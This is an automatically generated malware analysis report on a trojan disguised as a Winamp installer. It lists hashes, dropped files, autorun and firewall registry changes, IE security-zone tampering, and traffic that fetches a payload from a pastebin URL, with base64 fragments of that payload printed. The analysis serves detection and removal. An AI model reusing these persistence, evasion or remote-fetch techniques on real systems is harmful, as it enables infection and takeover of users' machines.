Trojan.MSIL.Zapchast.aehog (Kaspersky), Trojan.GenericKD.3075701 (AdAware), Installer.Win32.SmartIM.FD, InstallerSmartIM.YR (Lavasoft MAS)Behaviour: Trojan, Installer
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 6b2a96bc3d18a5d5546eeb363f8585f1
SHA1: 9d067a565429a17951e389465e4b4d70246dc366
SHA256: 9e311091090cb688be24f80e6ab648f085f62c784fe4c7d8a4e93b838c1534bb
SSDeep: 393216:g6Pb7dod23L0btVB0AAupxr3hBmgfjDO9WlcKOyul0e1:gKb7W2b0plr3bmgfjDMWUy J1
Size: 17302542 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: BorlandDelphi30, BorlandDelphiv30, UPolyXv05_v6
Company: no certificate found
Created at: 1992-06-20 01:22:17
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
downloader c sharp.exe:652
%original file name%.exe:632
netsh.exe:1480
The Trojan injects its code into the following process(es):
teskmanger.exe:516
winamp5666_full_all.exe:580
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process downloader c sharp.exe:652 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\teskmanger.exe (65 bytes)
The process %original file name%.exe:632 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\0002.tmp (1961 bytes)
%Program Files%\winamp5666_full_all.exe (390963 bytes)
%Program Files%\winamp\winamp\Uninstall.ini (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\temp_0.tmp (47091 bytes)
%Program Files%\winamp\winamp\Uninstall.exe (4436 bytes)
%Program Files%\downloader c sharp.exe (1568 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\2.tmp (68 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\0001.tmp (47091 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\0002.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\temp_0.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\0001.tmp (0 bytes)
The process winamp5666_full_all.exe:580 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsg3.tmp\LangDLL.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg3.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv2.tmp (45697 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsv1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg3.tmp (0 bytes)
Registry activity
The process downloader c sharp.exe:652 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5A 6A 38 64 3F 1F 15 E9 E1 0E 96 A9 8C BC 1E 3F"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU]
"di" = "!"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Application Data]
"teskmanger.exe" = "FireFox"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process teskmanger.exe:516 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B7 76 5D F1 EE 84 42 CF CB 42 D1 2B 8F 34 E1 CF"
[HKCU\Software\17c320a39f13ba5af3ce000a29a3404e]
"[kl]" = ""
[HKCU]
"di" = "!"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Environment]
"SEE_MASK_NOZONECHECKS" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"17c320a39f13ba5af3ce000a29a3404e" = "%Documents and Settings%\%current user%\Application Data\teskmanger.exe .."
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"17c320a39f13ba5af3ce000a29a3404e" = "%Documents and Settings%\%current user%\Application Data\teskmanger.exe .."
The process %original file name%.exe:632 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\winamp 5.666]
"InstallSource" = "c:\"
"InstallDate" = "20160415"
"EstimatedSize" = "16922"
"UninstallString" = "%Program Files%\winamp\winamp\Uninstall.exe"
"DisplayVersion" = "5.666"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%]
"downloader c sharp.exe" = "FireFox"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\winamp 5.666]
"NoModify" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\winamp 5.666]
"Publisher" = "winamp"
"VersionMajor" = "5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\winamp 5.666]
"DisplayIcon" = "%Program Files%\winamp\winamp\Uninstall.exe"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%]
"winamp5666_full_all.exe" = "Winamp Installer"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "99 F2 01 E6 31 A2 5B AB ED CF 1F 9D 55 03 AC 72"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\winamp 5.666]
"DisplayName" = "winamp 5.666"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\winamp 5.666]
"NoRepair" = "1"
"InstallLocation" = "%Program Files%\winamp\winamp\"
"Language" = "1033"
"VersionMinor" = "666"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The process netsh.exe:1480 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"BitNames" = " NAP_TRACE_BASE NAP_TRACE_NETSH"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"Guid" = "710adbf0-ce88-40b4-a50d-231ada6593f0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"Guid" = "b0278a28-76f1-4e15-b1df-14b209a12613"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "47 7D B4 FE 46 CC 89 60 0D E7 3F A4 47 72 BD E5"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
Adds a rule to the firewall Windows which allows any network activity:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\Application Data]
"teskmanger.exe" = "%Documents and Settings%\%current user%\Application Data\teskmanger.exe:*:Enabled:teskmanger.exe"
The process winamp5666_full_all.exe:580 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4D 40 0F 2A A8 D8 A1 71 9F 75 F6 D9 FF 60 71 46"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
Dropped PE files
MD5 | File path |
---|---|
227c6a6f69e227d79f08e44ee685785e | c:\Documents and Settings\"%CurrentUserName%"\Application Data\teskmanger.exe |
a1cd3f159ef78d9ace162f067b544fd9 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsg3.tmp\LangDLL.dll |
bf712f32249029466fa86756f5546950 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsg3.tmp\System.dll |
227c6a6f69e227d79f08e44ee685785e | c:\Program Files\downloader c sharp.exe |
110cd80079e9572aef511b0491e63b8c | c:\Program Files\winamp5666_full_all.exe |
96360030a40dc543d5347e1cf917f530 | c:\Program Files\winamp\winamp\Uninstall.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
downloader c sharp.exe:652
%original file name%.exe:632
netsh.exe:1480 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Application Data\teskmanger.exe (65 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\0002.tmp (1961 bytes)
%Program Files%\winamp5666_full_all.exe (390963 bytes)
%Program Files%\winamp\winamp\Uninstall.ini (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\temp_0.tmp (47091 bytes)
%Program Files%\winamp\winamp\Uninstall.exe (4436 bytes)
%Program Files%\downloader c sharp.exe (1568 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\2.tmp (68 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\0001.tmp (47091 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg3.tmp\LangDLL.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg3.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv2.tmp (45697 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"17c320a39f13ba5af3ce000a29a3404e" = "%Documents and Settings%\%current user%\Application Data\teskmanger.exe .."
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"17c320a39f13ba5af3ce000a29a3404e" = "%Documents and Settings%\%current user%\Application Data\teskmanger.exe .." - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name: winamp
Product Name:
Product Version:
Legal Copyright: winamp
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 5.666
File Description: winamp 5.666 Installation
Comments:
Language: English (United States)
Company Name: winampProduct Name: Product Version: Legal Copyright: winampLegal Trademarks: Original Filename: Internal Name: File Version: 5.666 File Description: winamp 5.666 Installation Comments: Language: English (United States)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
CODE | 4096 | 148684 | 148992 | 4.57091 | 5e14e4ede2e2215bc7d72837b9871f8f |
DATA | 155648 | 10388 | 10752 | 2.62963 | abafcbfbd7f8ac0226ca496a92a0cf06 |
BSS | 167936 | 4341 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.idata | 176128 | 6040 | 6144 | 3.3864 | a4e0ac39d5ed487ceea059fa23dfce5e |
.tls | 184320 | 8 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rdata | 188416 | 24 | 512 | 0.14174 | c4fdd0c5c9efb616fcc85d66056ca490 |
.reloc | 192512 | 6276 | 6656 | 4.56552 | 867a1120317d51734587a74f6ee70016 |
.rsrc | 200704 | 7388 | 7680 | 3.29485 | 0ca03688054739a451150988e825bf9e |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 8
2d310f9fd7e508e36dc492ed4a747ebc
43c4c1978a6de01afd8cee4b114754a0
22168eacdb2349a116e5ccc661dbdb86
b659ab8cca20689baa30aad970c4fd70
e0a3855f38ef976f298b4c68f62b4c33
ea7524801d5c0b511861c32e085e59c1
88a5f66e89ae9430fb59b42910009643
74f3f9a0ff2507197c4d5a4e19ada424
Network Activity
URLs
URL | IP |
---|---|
hxxp://pastebin.com/raw/U2sjN8vL | 104.20.63.56 |
qanasjrema.no-ip.biz | 62.16.66.195 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /raw/U2sjN8vL HTTP/1.1
Host: pastebin.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 14 Apr 2016 22:52:39 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d27769c06538c3575da5b7981848a85761460674359; expires=Fri, 14-Apr-17 22:52:39 GMT; path=/; domain=.pastebin.com; HttpOnly
X-Powered-By: PHP/5.5.5
Cache-Control: public, max-age=1801
Vary: Accept-Encoding
CF-Cache-Status: HIT
Expires: Thu, 14 Apr 2016 23:22:40 GMT
Server: cloudflare-nginx
CF-RAY: 293abab8081b16be-ARN
7d58..TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAGBbyFYAAAAAAAAAAOAAAgELAQgAAFYAAAAGAAAAAAAAvnQAAAAgAAAAgAAAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAADAAAAAAgAAAAAAAAIAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAGh0AABTAAAAAIAAAEACAAAAAAAAAAAAAAAAAAAAAAAAAKAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAxFQAAAAgAAAAVgAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAEACAAAAgAAAAAQAAABYAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAKAAAAACAAAAXAAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAACgdAAAAAAAAEgAAAACAAUALEsAADwpAAADAAAALwAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAQD2AAAAAAAAAHIBAABwgAEAAARyMwAAcIACAAAEFIADAAAEcj0AAHCABAAABHJbAABwgAUAAARyawAAcIAGAAAEcq0AAHCABwAABHLXAABwgAgAAARy4QAAcIAJAAAEcu0AAHAoBAAACoAKAAAEcvkAAHAoBAAACoALAAAEcu0AAHAoBAAACoAMAAAEcvkAAHAoBAAACoANAAAEKAUAAApvBgAACnMHAAAKgA4AAARzCAAACoAQAAAEFIARAAAEFoASAAAEcgMBAHCAEwAABBSAFAAABHMJAAAKgBUAAAQgARQAAI0MAAABgBYAAARyXwEAcIAXAAAEFIAYAAAEKgAAGzADADsAAAABAAARfhAAAARvCgAACm8LAAAKcmEBAHB BgAABCgMAAAKF28NAAAKAm8OAAAK3g4lKA8AAAoKKBAAAAreACoAARAAAAAAAAAsLAAODQAAARswAwBEAAAAAgAAEX4QAAAEbwoAAApvCwAACnJhAQBwfgYAAAQoDAAACm8RAAAKAgMoEgAACm8TAAAKCt4QJSgPAAAKCwMKKBAAAAreAAYqARAAAAAAAAAyMgAQDQAAARswBABGAAAAAwAAEX4QAAAEbwoAAApvCwAACnJhAQBwfgYAAAQoDAAACm8UAAAKAgMoEgAACgRvFQAAChcK3hAlKA8AAAoLFgooEAAACt4ABioAAAEQAAAAAAAANDQAEA0AAAEbMAQArQMAAAQAAB
<<< skipped >>>
GET /raw/U2sjN8vL HTTP/1.1
Host: pastebin.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 14 Apr 2016 22:52:32 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d057bf8bde70568e9fc963af32899d2721460674352; expires=Fri, 14-Apr-17 22:52:32 GMT; path=/; domain=.pastebin.com; HttpOnly
X-Powered-By: PHP/5.5.5
Cache-Control: public, max-age=1801
Vary: Accept-Encoding
CF-Cache-Status: EXPIRED
Expires: Thu, 14 Apr 2016 23:22:33 GMT
Server: cloudflare-nginx
CF-RAY: 293aba8c3063373e-ARN
3a22..TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAGBbyFYAAAAAAAAAAOAAAgELAQgAAFYAAAAGAAAAAAAAvnQAAAAgAAAAgAAAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAADAAAAAAgAAAAAAAAIAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAGh0AABTAAAAAIAAAEACAAAAAAAAAAAAAAAAAAAAAAAAAKAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAxFQAAAAgAAAAVgAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAEACAAAAgAAAAAQAAABYAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAKAAAAACAAAAXAAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAACgdAAAAAAAAEgAAAACAAUALEsAADwpAAADAAAALwAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAQD2AAAAAAAAAHIBAABwgAEAAARyMwAAcIACAAAEFIADAAAEcj0AAHCABAAABHJbAABwgAUAAARyawAAcIAGAAAEcq0AAHCABwAABHLXAABwgAgAAARy4QAAcIAJAAAEcu0AAHAoBAAACoAKAAAEcvkAAHAoBAAACoALAAAEcu0AAHAoBAAACoAMAAAEcvkAAHAoBAAACoANAAAEKAUAAApvBgAACnMHAAAKgA4AAARzCAAACoAQAAAEFIARAAAEFoASAAAEcgMBAHCAEwAABBSAFAAABHMJAAAKgBUAAAQgARQAAI0MAAABgBYAAARyXwEAcIAXAAAEFIAYAAAEKgAAGzADADsAAAABAAARfhAAAARvCgAACm8LAAAKcmEBAHB BgAABCgMAAAKF28NAAAKAm8OAAAK3g4lKA8AAAoKKBAAAAreACoAARAAAAAAAAAsLAAODQAAARswAwBEAAAAAgAAEX4QAAAEbwoAAApvCwAACnJhAQBwfgYAAAQoDAAACm8RAAAKAgMoEgAACm8TAAAKCt4QJSgPAAAKCwMKKBAAAAreAAYqARAAAAAAAAAyMgAQDQAAARswBABGAAAAAwAAEX4QAAAEbwoAAApvCwAACnJhAQBwfgYAAAQoDAAACm8UAAAKAgMoEgAACgRvFQAAChcK3hAlKA8AAAoLFgooEAAACt4ABioAAAEQAAAAAAAANDQAEA0AAAEbMAQArQMAAAQAAB
<<< skipped >>>
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
%original file name%.exe_632:
.idata
.idata
.rdata
.rdata
P.reloc
P.reloc
P.rsrc
P.rsrc
uxtheme.dll
uxtheme.dll
;CRt$
;CRt$
PSAPI.dll
PSAPI.dll
kernel32.dll
kernel32.dll
1.1.4
1.1.4
SOFTWARE\Microsoft\Windows\CurrentVersion
SOFTWARE\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion\GrpConv\MapGroups
Software\Microsoft\Windows\CurrentVersion\GrpConv\MapGroups
Software\Microsoft\Windows
Software\Microsoft\Windows
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
URLInfoAbout
URLInfoAbout
SOFTWARE\Microsoft\.NETFramework\policy
SOFTWARE\Microsoft\.NETFramework\policy
..\sim.exe
..\sim.exe
deflate 1.1.4 Copyright 1995-2002 Jean-loup Gailly
deflate 1.1.4 Copyright 1995-2002 Jean-loup Gailly
inflate 1.1.4 Copyright 1995-2002 Mark Adler
inflate 1.1.4 Copyright 1995-2002 Mark Adler
user32.dll
user32.dll
GetKeyboardType
GetKeyboardType
advapi32.dll
advapi32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
oleaut32.dll
oleaut32.dll
WinExec
WinExec
gdi32.dll
gdi32.dll
GetKeyState
GetKeyState
ExitWindowsEx
ExitWindowsEx
EnumWindows
EnumWindows
winmm.dll
winmm.dll
ole32.dll
ole32.dll
comctl32.dll
comctl32.dll
shell32.dll
shell32.dll
GetWindowsDirectoryA
GetWindowsDirectoryA
RegQueryInfoKeyA
RegQueryInfoKeyA
RegEnumKeyExA
RegEnumKeyExA
RegCreateKeyExA
RegCreateKeyExA
ShellExecuteExA
ShellExecuteExA
ShellExecuteA
ShellExecuteA
cabinet.dll
cabinet.dll
0(0,00040
0(0,00040
7 7$717?7
7 7$717?7
? ?$?(?,?0?4?
? ?$?(?,?0?4?
11h1
11h1
KWindows
KWindows
UrlMon
UrlMon
version="1.0.0.0"
version="1.0.0.0"
name="Microsoft.Windows.SIM"
name="Microsoft.Windows.SIM"
name="Microsoft.Windows.Common-Controls"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
publicKeyToken="6595b64144ccf1df"
winamp5666_full_all.exe_580:
.text
.text
`.rdata
`.rdata
@.data
@.data
.ndata
.ndata
.rsrc
.rsrc
@.reloc
@.reloc
RegDeleteKeyExW
RegDeleteKeyExW
Kernel32.DLL
Kernel32.DLL
PSAPI.DLL
PSAPI.DLL
%s=%s
%s=%s
GetWindowsDirectoryW
